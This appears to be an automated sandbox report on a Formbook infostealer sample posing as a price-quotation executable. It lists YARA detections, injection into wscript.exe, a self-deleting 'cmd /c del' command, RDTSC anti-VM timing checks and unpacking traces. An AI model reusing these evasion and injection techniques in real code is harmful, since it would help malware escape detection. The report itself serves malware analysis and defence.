Source: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe

Code function: 0_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 0_2_00406354
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 0_2_00404802
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 0_2_00406B2B
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 0_2_7333AA17
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 0_2_7333AA08
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00401027
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00401030
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_0041C966
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_0041B931
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00401208
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_0041BB7C
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_0041CBD9
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00408C8B
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00408C90
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_0041C5D1
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00402D90
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_0041A6B6
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00402FB0
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009EB090
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A91002
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009DF900
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009F4120
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C6B090
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D11002
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C6841F
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C6D5E0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D21D55
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C5F900
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C50D20
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C74120
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C76E30
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C8EBB0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B4B931
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B4C966
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B4CBD9
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B4BB7C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B38C90
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B38C8B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B32D90
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B4A6B6
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B32FB0

Source: C:\Windows\SysWOW64\wscript.exe

Code function: String function: 04C5B150 appears 32 times

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_004185D0 NtCreateFile,
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00418680 NtReadFile,
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00418700 NtClose,
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_004187B0 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_004185CB NtCreateFile,
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_0041867A NtReadFile,
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_004186FB NtClose,
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_0041872A NtClose,
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_004187AA NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A198F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A19860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A19840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A199A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A19910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A19A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A19A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A19A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A195D0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A19540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A196E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A19660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A197A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A19780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A19FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A19710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A198A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A19820 NtEnumerateKey,
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A1B040 NtSuspendThread,
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A199D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A19950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C995D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C999A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C996D0 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C996E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99650 NtQueryValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C998F0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C998A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C9B040 NtSuspendThread,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99820 NtEnumerateKey,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C999D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C995F0 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99560 NtWriteFile,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99520 NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C9AD30 NtSetContextThread,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99A80 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99670 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99A00 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99610 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99A10 NtQuerySection,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99A20 NtResumeThread,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C997A0 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C9A3B0 NtGetContextThread,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99760 NtOpenProcess,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99770 NtSetInformationFile,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C9A770 NtOpenThread,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99B00 NtSetValueKey,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C9A710 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C99730 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B485D0 NtCreateFile,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B48680 NtReadFile,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B487B0 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B48700 NtClose,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B485CB NtCreateFile,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B486FB NtClose,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B4867A NtReadFile,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B487AA NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B4872A NtClose,

Source: PRICE_REQUEST_QUOTATION.exe, 00000000.00000003.269417802.000000000EABF000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PRICE_REQUEST_QUOTATION.exe
Source: PRICE_REQUEST_QUOTATION.exe, 00000003.00000002.341516961.0000000000C5F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PRICE_REQUEST_QUOTATION.exe
Source: PRICE_REQUEST_QUOTATION.exe, 00000003.00000002.340904914.0000000000719000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenamewscript.exe` vs PRICE_REQUEST_QUOTATION.exe

Source: PRICE_REQUEST_QUOTATION.exe	Virustotal: Detection: 34%
Source: PRICE_REQUEST_QUOTATION.exe	ReversingLabs: Detection: 28%

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe

File read: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe

Jump to behavior

Source: PRICE_REQUEST_QUOTATION.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe'
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Process created: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe'
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Process created: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe'
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe'

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe

File created: C:\Users\user\AppData\Local\Temp\nsn8CC7.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@8/2@9/5

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe

Code function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar,

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe

Code function: 0_2_004042C1 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:496:120:WilError_01

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source:	Binary string: wscript.pdbGCTL source: PRICE_REQUEST_QUOTATION.exe, 00000003.00000002.340904914.0000000000719000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdbUGP source: PRICE_REQUEST_QUOTATION.exe, 00000000.00000003.270120723.000000000E9A0000.00000004.00000001.sdmp, PRICE_REQUEST_QUOTATION.exe, 00000003.00000002.341087342.00000000009B0000.00000040.00000001.sdmp, wscript.exe, 00000011.00000002.524645016.0000000004D4F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: PRICE_REQUEST_QUOTATION.exe, wscript.exe
Source:	Binary string: wscript.pdb source: PRICE_REQUEST_QUOTATION.exe, 00000003.00000002.340904914.0000000000719000.00000004.00000020.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe

Unpacked PE file: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_0041B87C push eax; ret
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_0041B812 push eax; ret
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_0041B81B push eax; ret
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_0041603B push eax; ret
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_0041B148 pushad ; ret
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_004152B0 pushad ; retf
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_004105D2 push ebp; ret
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_004156A7 push ss; ret
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_0041B7C5 push eax; ret
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A2D0D1 push ecx; ret
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CAD0D1 push ecx; ret
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B4603B push eax; ret
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B4B812 push eax; ret
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B4B81B push eax; ret
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B4B87C push eax; ret
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B4B148 pushad ; ret
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B452B0 pushad ; retf
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B405D2 push ebp; ret
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B456A7 push ss; ret
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_00B4B7C5 push eax; ret

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe

File created: C:\Users\user\AppData\Local\Temp\nsi8CF7.tmp\akepwc.dll

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete

Show sources

Source: C:\Windows\SysWOW64\wscript.exe	Process created: /c del 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe'
Source: C:\Windows\SysWOW64\wscript.exe	Process created: /c del 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe'

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe	RDTSC instruction interceptor: First address: 0000000000B38614 second address: 0000000000B3861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe	RDTSC instruction interceptor: First address: 0000000000B389AE second address: 0000000000B389B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Windows\explorer.exe TID: 2244	Thread sleep time: -45000s >= -30000s
Source: C:\Windows\SysWOW64\wscript.exe TID: 5540	Thread sleep time: -34000s >= -30000s

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\wscript.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe

Code function: 3_2_004088E0 rdtsc

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 0_2_00405EC2 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 0_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 0_2_00402671 FindFirstFileA,

Source: explorer.exe, 00000006.00000000.304126686.000000000DD44000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}.66
Source: explorer.exe, 00000006.00000000.286630230.000000000891C000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.313086176.000000000374F000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000006.00000000.276302180.00000000011B3000.00000004.00000020.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 00000006.00000000.290796557.0000000008C5E000.00000004.00000001.sdmp	Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}((
Source: explorer.exe, 00000006.00000000.319747603.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000006.00000000.298466156.00000000053C4000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000006.00000000.319747603.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe

Code function: 3_2_004088E0 rdtsc

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\wscript.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 0_2_7333A402 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 0_2_7333A706 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 0_2_7333A744 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 0_2_7333A616 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 0_2_7333A6C7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A190AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009D9080 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A0F0BF mov ecx, dword ptr fs:[00000030h]
